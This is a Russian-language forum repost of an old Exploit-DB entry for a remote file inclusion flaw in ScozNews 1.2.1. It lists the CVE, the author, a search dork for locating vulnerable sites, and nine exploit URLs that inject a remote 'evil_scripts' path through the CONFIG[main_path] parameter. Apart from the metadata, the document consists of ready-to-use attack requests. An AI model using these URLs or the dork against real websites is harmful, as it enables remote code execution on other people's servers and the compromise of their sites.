Exploit ScozNews 1.2.1 - 'mainpath' Remote File Inclusion

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
1800
Проверка EDB
  1. Пройдено
Автор
KACPER
Тип уязвимости
WEBAPPS
Платформа
PHP
CVE
cve-2006-2487
Дата публикации
2006-05-17
Код:
################ DEVIL TEAM THE BEST POLISH TEAM #################
#ScozNews v1.2.1 - Remote File Include
#Find by Kacper (Rahim).
#Greetings For ALL DEVIL TEAM members, Special DragonHeart :***
#Contact: [email protected]   or   http://www.devilteam.yum.pl
#dork: "(Powered By ScozNews)"
##################################################################

http://www.site.com/[news_path]/sources/functions.php?CONFIG[main_path]=[evil_scripts]


http://www.site.com/[news_path]/sources/template.php?CONFIG[main_path]=[evil_scripts]


http://www.site.com/[news_path]/sources/news.php?CONFIG[main_path]=[evil_scripts]

http://www.site.com/[news_path]/sources/help.php?CONFIG[main_path]=[evil_scripts]

http://www.site.com/[news_path]/sources/mail.php?CONFIG[main_path]=[evil_scripts]

http://www.site.com/[news_path]/sources/Admin/admin_cats.php?CONFIG[main_path]=[evil_scripts]

http://www.site.com/[news_path]/sources/Admin/admin_edit.php?CONFIG[main_path]=[evil_scripts]

http://www.site.com/[news_path]/sources/Admin/admin_import.php?CONFIG[main_path]=[evil_scripts]

http://www.site.com/[news_path]/sources/Admin/admin_templates.php?CONFIG[main_path]=[evil_scripts]

###################################################################
#Elo ;-)

# milw0rm.com [2006-05-17]
 
Источник
www.exploit-db.com

Похожие темы